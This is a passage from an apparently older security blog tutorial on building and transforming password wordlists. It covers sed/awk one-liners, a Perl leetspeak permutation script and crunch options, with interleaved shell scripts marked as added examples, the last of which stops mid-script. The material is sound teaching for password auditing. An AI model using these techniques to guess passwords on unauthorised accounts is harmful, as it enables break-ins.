To suffix up to 3 digits in sequence from 0 - 999 ;</div>
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 999 ; done > wordlist_numbers.txt</span><br />
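The for i in $(cat wordlist.txt) loops above work for plain words, but they word-split on whitespace (a line like 'pass word' becomes two words) and they paste the word into seq's format string, so a '%' inside a word breaks seq. As an added example (my own, not from the post) this POSIX shell function does the same prefixing and suffixing, covering both the fixed-width (00 - 99) and the 'up to N digits' (0 - 99) variants, reading the wordlist line by line and passing the word to printf as an argument ; the sample words are constructed for the demonstration.<br />

```shell
#!/bin/sh
# Prefix or suffix a numeric sequence to every line of a wordlist, reading
# the list line by line (added example, not from the post). Unlike
# `for i in $(cat wordlist.txt)`, this keeps words containing spaces intact,
# and because the word is passed to printf as an argument rather than pasted
# into the format string, a '%' inside a word cannot break it.
#   number_words prefix|suffix WIDTH START END < wordlist.txt
# WIDTH 2 with END 99 gives 00..99; WIDTH 1 with END 99 gives "up to 2 digits" 0..99.
number_words() {
    mode=$1 width=$2 start=$3 end=$4
    case $mode in
        prefix) fmt="%0${width}d%s\n" ;;
        suffix) fmt="%s%0${width}d\n" ;;
        *) echo "mode must be prefix or suffix" >&2; return 1 ;;
    esac
    # `|| [ -n "$word" ]` keeps a final line that lacks a trailing newline
    while IFS= read -r word || [ -n "$word" ]; do
        n=$start
        while [ "$n" -le "$end" ]; do
            if [ "$mode" = prefix ]; then
                printf "$fmt" "$n" "$word"
            else
                printf "$fmt" "$word" "$n"
            fi
            n=$((n + 1))
        done
    done
}

# Constructed sample list: a word with a space and one with a '%' in it,
# both of which the seq-based loops mishandle.
sample_words() {
    printf 'pass word\n100%%\nfubar\n'
}

sample_words | number_words suffix 2 0 99 | head -3     # "pass word00" ...
sample_words | number_words prefix 1 0 9  | tail -1     # "9fubar"
```

For a real wordlist redirect it in (number_words suffix 2 0 99 < wordlist.txt > wordlist_numbers.txt); the output order is the same as the seq loops produce, all numbers for the first word, then all for the second, and so on.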
<br />
<br />
<br />
<div style="color: yellow;">
<b><u>INCLUDE CHARACTERS AT SPECIFIC POSITION</u></b></div>
<br />
To include the word "test" after the first 2 characters ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^../&test/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^.\{2\}/&test/' wordlist.txt</span><br />
<br />
<br />
To include the word "test" before the last 2 characters ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/..$/test&/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.\{2\}$/test&/' wordlist.txt</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>REPLACE X NUMBER OF CHARACTERS FROM START OF WORDLIST</b></u></div>
<br />
To replace the first character of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./test/' wordlist.txt</span><br />
<br />
To replace the first 2 characters of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^../test/' wordlist.txt</span><br />
<br />
To replace the first 3 characters of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^.../test/' wordlist.txt </span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^.\{3\}/test/' wordlist.txt</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>REPLACE/SUBSTITUTE X NUMBER OF CHARACTERS FROM END OF WORDLIST</b></u></div>
<br />
To replace the last character of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/test/' wordlist.txt</span><br />
<br />
To replace the last 2 characters of each word with "test" ;<br />
<div>
<span class="Apple-style-span" style="color: lime;">sed 's/..$/test/' wordlist.txt</span></div>
<br />
To replace the last 3 characters of each word with "test" ;<br />
<div>
<span class="Apple-style-span" style="color: lime;">sed 's/...$/test/' wordlist.txt</span></div>
<div>
or</div>
<div>
<span class="Apple-style-span" style="color: lime;">sed 's/.\{3\}$/test/' wordlist.txt</span></div>
<br />
<br />
<br />
<div style="color: yellow;">
<u><b>REPLACE/SUBSTITUTE CHARACTER(S) AT A CERTAIN POSITION</b></u></div>
<br />
To substitute the third character of each word in the wordlist with "test" ; <br />
<br />
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{2})(.{1})/\1test/" wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^\(.\{2\}\)\(.\{1\}\)/\1test/' wordlist.txt</span><br />
<br />
To substitute the third and fourth character of each word in the wordlist with "test" ; <br />
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{2})(.{2})/\1test/" wordlist.txt</span><br />
<br />
<div>
To substitute the fourth character of each word in the wordlist with "test" ;</div>
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{3})(.{1})/\1test/" wordlist.txt</span><br />
<br />
To substitute the fourth and fifth character of each word in the wordlist with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{3})(.{2})/\1test/" wordlist.txt</span><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="color: red;">NOTE! </span></div>
<div>
If the number of characters to be replaced is greater than the number of characters in the word, the word remains unaltered.</div>
<div>
So if doing </div>
<div>
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{3})(.{2})/\1test/" wordlist.txt</span></div>
<div>
4-character words such as 'beta' would not be altered as there is no fifth character. </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="color: yellow;"><u><b>REVERSE THE DIRECTION OF THE WORDS IN WORDLIST</b></u></span></div>
<br />
<span class="Apple-style-span" style="color: lime;">rev wordlist.txt</span><br />
<br />
<br />
<br />
<br />
<b style="color: yellow;">REMOVING WORDS WHICH DON'T HAVE 'X' NUMBER OF NUMERIC VALUES</b><br />
<br />
To keep only the words in wordlist.txt that contain exactly 3 numeric values (words with fewer or more digits are dropped)<br />
<br />
<span style="color: lime;">nawk 'gsub("[0-9]","&",$0)==3' wordlist.txt</span><br />
<br />
<br />
<b>REMOVE WORDS WITH X NUMBER OF REOCURRING CHARACTERS</b><br />
<br />
Under construction ;)<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b style="color: yellow;"><u>REMOVING WORDS WHICH HAVE MORE THAN 2 IDENTICAL ADJACENT CHARACTERS</u></b><br />
<br />
<span class="Apple-style-span" style="color: lime;"><acronym title="Stream Editor">sed</acronym> '/\([^A-Za-z0-9_]\|[A-Za-z0-9]\)\1\{2,\}/d' wordlist.txt</span><br />
<br />
<span style="color: lime;">sed "/\(.\)\1\1/d" wordlist.txt</span><br />
<br />
To delete words with more than 3 identical adjacent characters ;<br />
<br />
<span style="color: lime;">sed "/\(.\)\1\1\1/d" wordlist.txt</span>
<br />
<br />
<br />
Some great bit of work from Gitsnik on manipulating wordlists to ignore words with<br />
<div>
more than 2 adjacent identical characters ;<br />
<a href="http://gitsnik.blogspot.com/2011/08/unique-characters-from-crunch-redux.html">http://gitsnik.blogspot.com/2011/08/unique-characters-from-crunch-redux.html</a></div>
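The suffixing, positional insert/replace, digit-count and adjacent-repeat one-liners above, gathered into one added shell script (my example, not part of the original post) and run over a small constructed wordlist so each transformation can be checked; it assumes GNU sed and GNU seq, and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the original post: the sed/awk/seq one-liners from the
# sections above, wrapped as functions and run over a small constructed wordlist so
# each transformation can be checked. Assumes GNU sed (the -r flag) and GNU seq.

# Constructed sample wordlist (six candidates, one per line).
SAMPLE_WORDLIST='password
beta
aaa123
ab1c2d3e
qwerty
boooks'

words() { printf '%s\n' "$SAMPLE_WORDLIST"; }

# Append a fixed suffix to every word. Anchoring on "$" adds to the line;
# "s/.$/test/" would instead overwrite the last character.
suffix_word() {           # $1 = suffix (must not contain "/")
    sed "s/\$/$1/"
}

# Append a zero-padded counter 0..$2 of width $1 to every word (00-99 for width 2).
# The word becomes part of the printf-style format, so it must not contain "%".
suffix_numbers() {        # $1 = width, $2 = last number
    while IFS= read -r word; do
        seq -f "${word}%0$1.0f" 0 "$2"
    done
}

# Insert a string after the first N characters of each word.
insert_after() {          # $1 = N, $2 = string
    sed "s/^.\{$1\}/&$2/"
}

# Replace N characters following the first P with a string. Words shorter than
# P+N characters do not match the pattern and pass through unchanged (the NOTE above).
replace_at() {            # $1 = P, $2 = N, $3 = string
    sed -r "s/^(.{$1})(.{$2})/\1$3/"
}

# Keep only words containing exactly N digits (gsub returns the match count).
keep_digit_count() {      # $1 = N
    awk -v n="$1" 'gsub(/[0-9]/, "&") == n'
}

# Drop words with three or more identical adjacent characters ("aaa", "ooo").
drop_triple_repeats() {
    sed '/\(.\)\1\1/d'
}

# Walk-through: show each transformation on the sample list.
demo() {
    echo '--- suffix "test"';         words | suffix_word test
    echo '--- insert "test" after 2'; words | insert_after 2 test
    echo '--- replace 3rd char';      words | replace_at 2 1 test
    echo '--- exactly 3 digits';      words | keep_digit_count 3
    echo '--- no triple repeats';     words | drop_triple_repeats
}

# Run the walk-through only when invoked as "sh wordlist_ops.sh demo".
if [ "${1:-}" = demo ]; then demo; fi
```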
<div>
</div>
<br />
<br />
<b><span class="Apple-style-span" style="color: yellow;"><u>APPENDING WORDS FROM 1 WORDLIST TO ALL THE WORDS IN ANOTHER WORDLIST</u></span></b><br />
<br />
See Wordlist Manipulator script at top of page<br />
<br />
<br />
<b>PERMUTE WORD / WORDLIST</b><br />
To give all possible variations of a word / wordlist, fantastic bit of perl by Gitsnik ;<br />
Copy / Paste the below and save as permute.pl<br />
chmod 755 permute.pl to make executable.<br />
<br />
To test on a single word (for instance "firewall") do ;<br />
echo firewall | ./permute.pl<br />
To test on a wordlist do ;<br />
./permute.pl wordlist.txt<br />
<br />
<br />
<span style="color: lime;">#!/usr/bin/perl</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">use strict;</span><br />
<span style="color: lime;">use warnings;</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">my %permution = (</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"a" => [ "a", "4", "@", "&", "A" ],</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"b" => "bB",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"c" => "cC",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"d" => "dD",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"e" => "3Ee",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"f" => "fF",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"g" => "gG9",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"h" => "hH",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"i" => "iI!|1",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"j" => "jJ",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"k" => "kK",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"l" => "lL!71|",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"m" => "mM",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"n" => "nN",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"o" => "oO0",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"p" => "pP",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"q" => "qQ",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"r" => "rR",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"s" => "sS5$",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"t" => "tT71+",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"u" => "uU",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"v" => "vV",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"w" => ["w", "W", "\/\/"],</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"x" => "xX",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"y" => "yY",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"z" => "zZ2",</span><br />
<span style="color: lime;">);</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"># End config</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">while(my $word = <>) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>chomp $word;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @string = split //, lc($word);</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>&permute(0, @string);</span><br />
<span style="color: lime;">}</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">sub permute {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $num = shift;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @str = @_;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $len = @str;</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($num >= $len) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>foreach my $char (@str) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print $char;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print "\n";</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $per = $permution{$str[$num]};</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($per) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @letters = ();</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(ref($per) eq 'ARRAY') {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>@letters = @$per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>@letters = split //, $per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$per = "";</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>foreach $per (@letters) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $s = "";</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>for(my $i = 0; $i < $len; $i++) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($i eq 0) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($i eq $num) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s = $per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s = $str[0];</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($i eq $num) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s .= $per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s .= $str[$i];</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @st = split //, $s;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>&permute(($num + 1), @st);</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>&permute(($num + 1), @str);</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;">}</span><br />
<br />
<br />
..<br />
..<br />
..<br />
Please leave your comments, suggestions, mocking words of wisdom..etc.. so that the post can benefit from<br />
the vast amount of knowledge out there.</div>
Creating wordlists with crunch v3.0 (posted 2011-05-22, updated 2012-11-28)<div dir="ltr" style="text-align: left;" trbidi="on">
<u><b>CRUNCH v3.0 </b></u><br />
<br />
<div style="color: red;">
Warning... this is a looong post, grab a beverage.. ;) Also heavy on images.. <br />
<br /></div>
<u>PRE-INTRO </u><br />
<br />
Since the post on Creating wordlists with crunch v2.4 made in April last year, crunch has gone through<br />
quite a few changes and improvements and bofh28 has now released v3.0 ! (on 16-05-2011) <br />
To make sure the information on this blog stays up to date, it's time for a new and improved post.<br />
There will be a lot of duplication from my previous post on crunch, but it should then at least<br />
be a more or less full and complete post.<br />
<br />
I have tried to follow the alphabetical order of the options and have done a chapter per option/switch.<br />
<i> </i><br />
<i>Please leave comments should the post be lacking information on anything you feel should be included. </i><br />
<br />
<br />
<u>INTRODUCTION</u><br />
<br />
crunch is a tool for creating bruteforce wordlists which can be used to audit password strength.<br />
The size of these wordlists is not to be underestimated; however, crunch can make use of patterns to reduce wordlist sizes and can compress output files in various formats. Since v2.6 it also prints a message advising the size of the wordlist that will be created, giving you a 3 second window to stop the creation should the size be too large for your intended use.<br />
<br />
<u>The full range of options is as follows ;</u><br />
<b style="color: red;">-b</b> Maximum bytes to write per file, so using this option the wordlist to be created can be split into various<br />
sizes such as KB / MB / GB (must be used in combination with "-o START" switch) <br />
<b style="color: red;">-c</b> Number of lines to write to output file, must be used together with "-o START" <br />
<span style="color: red;"><b>-d</b></span> Limits the number of consecutive identical characters (<i>crunch v3.2</i>)<br />
<b><span class="Apple-style-span" style="color: red;">-e</span></b> Specifies when crunch should stop early (<i>crunch v3.1</i>)<br />
<b style="color: red;">-f</b> Path to the charset.lst file to use, standard location is '/pentest/passwords/crunch/charset.lst' <br />
to be used in conjunction with the name of the desired charset list, such as 'mixalpha-numeric-space' <br />
<b style="color: red;">-i</b> Inverts the output sequence from left-to-right to right-to-left<br />
(So instead of aaa, aab, aac, aad etc, output would be aaa baa caa daa)<br />
<b style="color: red;">-l</b> When specifying custom patterns with the -t option, the -l switch allows you to identify which of the characters<br />
should be taken as a literal character instead of a placeholder ( <span style="color: yellow;">@,%^</span> )<br />
<b><span style="color: red;">-o</span></b> Allows you to specify the file name / location for the output, e.g. /media/flashdrive/wordlist.txt<br />
<b style="color: red;">-p</b> Prints permutations of the words or characters provided in the command line. <br />
<b style="color: red;">-q</b> Prints permutation of the words or characters found in a specified file<br />
<b style="color: red;">-r</b> Resumes from a previous session, exact same syntax to be used followed by -r<br />
<b style="color: red;">-s</b> Allows you to specify the starting string for your wordlist.<br />
<b style="color: red;">-t</b> Allows you to specify a specific pattern to use. Probably one of the most important functions !<br />
Place holders for fixed character sets are ;<br />
<b><span style="color: yellow;">@</span></b> -- lower case alpha characters<br />
<b style="color: yellow;">, </b> -- upper case alpha characters<br />
<b style="color: yellow;">%</b> -- numeric characters<br />
<b><span style="color: yellow;">^</span></b> -- special characters (including space) <br />
<b style="color: red;">-u</b> Suppresses the output of wordlist size & linecount prior to starting wordlist generation. <br />
<b style="color: red;">-z</b> Adds support to compress the generation output, supports gzip, bzip & lzma<br />
<br />
<br />
All the below is done on backtrack 5, <i><b>only tested on the 32bit versions</b></i>.<br />
crunch is not installed by default on BT5 and as yet (22-05-2011) not in the repos.<br />
(When it does hit the repos I will amend this post to reflect installing from the repos)<br />
<br />
so download from the source at ;<br />
<a href="http://sourceforge.net/projects/crunch-wordlist/">http://sourceforge.net/projects/crunch-wordlist/</a><br />
<u><i style="color: red;">Edit; 29-01-2012</i></u><br />
and install as follows;<br />
<div style="color: lime;">
tar -xvf crunch-3.2.tgz</div>
<div style="color: lime;">
cd crunch3.2/</div>
<div style="color: lime;">
make && make install</div>
<br />
<b><i><u>Edit 12-06-2011</u></i></b><br />
crunch is now available in the BT repositories,<br />
so can download and install on backtrack5 simply by doing a ;<br />
<div style="color: lime;">
apt-get update<br />
apt-get install crunch</div>
<br />
<br />
<div style="color: yellow;">
<b><u>BASIC USAGE AND CHARACTER SETS</u></b></div>
<br />
The default installation directory / path for crunch in backtrack 5 is<br />
<div style="color: lime;">
/pentest/passwords/crunch/</div>
<br />
All the below examples are based on being in the crunch directory <span style="color: yellow;">/pentest/passwords/crunch/</span><br />
To run crunch from outside of crunch's own directory use ;<br />
/pentest/passwords/crunch/crunch [min length] [max length] [character set] [options]<br />
<i>example from root directory;</i><br />
<div style="color: lime;">
/pentest/passwords/crunch/crunch 8 8 abc + + \!\@\# -t TEST^%,@ -o test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_ntowndir-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_ntowndir-1.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Basic usage is as follows to print to screen<br />
<div style="color: yellow;">
./crunch [min length] [max length] [character set] [options]</div>
<br />
To write to file use the -o switch ;<br />
<div style="color: yellow;">
./crunch [min length] [max length] [character set] [options] -o filename.txt</div>
<br />
If no character set is defined, then crunch will default to using the lower case alpha character set;<br />
<div style="color: lime;">
./crunch 4 4</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_4-4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_4-4.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Also any desired character set can be entered manually in the command line ;<br />
<span style="color: lime;">./crunch 6 6 0123456789ABCDEF</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6HEXU.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6HEXU.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Certain characters will need escaping with a backslash <b><span style="color: red;">\</span></b> ; <br />
<div style="color: lime;">
./crunch 6 6 ABC\!\@\#\$</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6SPEC.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6SPEC.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">
<u><b>CREATING WORDLISTS IN BLOCKS OF A CERTAIN SIZE</b></u></div>
<br />
Using the <b style="color: red;">-b</b> switch, we can tell crunch to create a wordlist which is split into multiple files<br />
of user-specified sizes.<br />
This must be done in conjunction with -o START.<br />
<br />
The size definition can be; kb, mb, gb or kib, mib, gib<br />
kb, mb, and gb are based on the power of 10 (i.e. 1KB = 1000 bytes)<br />
kib, mib, and gib are based on the power of 2 (i.e. 1KiB = 1024 bytes).<br />
<br />
The output files will be named after the first and last entry in the wordlists.<br />
<br />
To create a wordlist split into files of not more than 1mb;<br />
<div style="color: lime;">
./crunch 6 6 0123456789 -b 1mb -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_1mb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_1mb.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist split in files of no more than 100mb;<br />
<div style="color: lime;">
./crunch 8 8 abcDEF123 -b 100mb -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_100mb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_100mb.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist split into files of no more than 10kb;<br />
<div style="color: lime;">
./crunch 4 4 0123456789 -b 10kb -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_10kb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_10kb.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist split into files of no more than 2gb;<br />
<div style="color: lime;">
./crunch 8 8 0123456789ABCDEF -b 2gb -o START</div>
etc.<br />
etc.<br />
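Before starting a run like the ones above (or the 8-character mixalpha-numeric-all-space one further down), it helps to know how much disk the output will take. The following added shell script (my example, not part of the post or of crunch) estimates line count, byte size and the number of -b chunks from first principles: every candidate of length L is written as L+1 bytes including its newline, and kb/mb/gb are powers of ten while kib/mib/gib are powers of two, as described above; the function names are mine and the charset is given as its size.

```shell
#!/bin/sh
# Added example, not part of the original post or of crunch: estimate the size of
# a crunch run before starting it. A fixed-length wordlist of length L over a
# charset of C characters has C^L candidates, each written as L+1 bytes (the
# trailing newline); a min..max run sums that over every length. Shell integer
# arithmetic is 64-bit, so keep C^L below about 9.2e18.

# C raised to the power L, by repeated multiplication (no bc/awk dependency).
power() {                 # $1 = base, $2 = exponent
    p=1; k=0
    while [ "$k" -lt "$2" ]; do p=$((p * $1)); k=$((k + 1)); done
    echo "$p"
}

# Total number of candidates (lines) for lengths min..max over a charset of size C.
estimate_lines() {        # $1 = min length, $2 = max length, $3 = charset size
    total=0; len=$1
    while [ "$len" -le "$2" ]; do
        total=$((total + $(power "$3" "$len"))); len=$((len + 1))
    done
    echo "$total"
}

# Total bytes written: each candidate of length L costs L+1 bytes.
estimate_bytes() {        # $1 = min length, $2 = max length, $3 = charset size
    total=0; len=$1
    while [ "$len" -le "$2" ]; do
        total=$((total + $(power "$3" "$len") * (len + 1))); len=$((len + 1))
    done
    echo "$total"
}

# Convert a -b argument such as 1mb, 100mb, 10kb, 2gb or 1mib to bytes:
# kb/mb/gb are powers of ten, kib/mib/gib powers of two, as the -b switch defines them.
size_to_bytes() {         # $1 = size string
    num=$(printf '%s' "$1" | sed 's/[^0-9].*//')
    unit=$(printf '%s' "$1" | sed 's/^[0-9]*//' | tr 'A-Z' 'a-z')
    case $unit in
        kb)  echo $((num * 1000)) ;;
        mb)  echo $((num * 1000 * 1000)) ;;
        gb)  echo $((num * 1000 * 1000 * 1000)) ;;
        kib) echo $((num * 1024)) ;;
        mib) echo $((num * 1024 * 1024)) ;;
        gib) echo $((num * 1024 * 1024 * 1024)) ;;
        *)   echo "size_to_bytes: unknown unit '$unit'" >&2; return 1 ;;
    esac
}

# Number of output files a "-b SIZE -o START" run needs (ceiling division), assuming
# each file is filled right up to the limit; this is an estimate, crunch's own split
# may differ by a file when whole lines do not divide the chunk size evenly.
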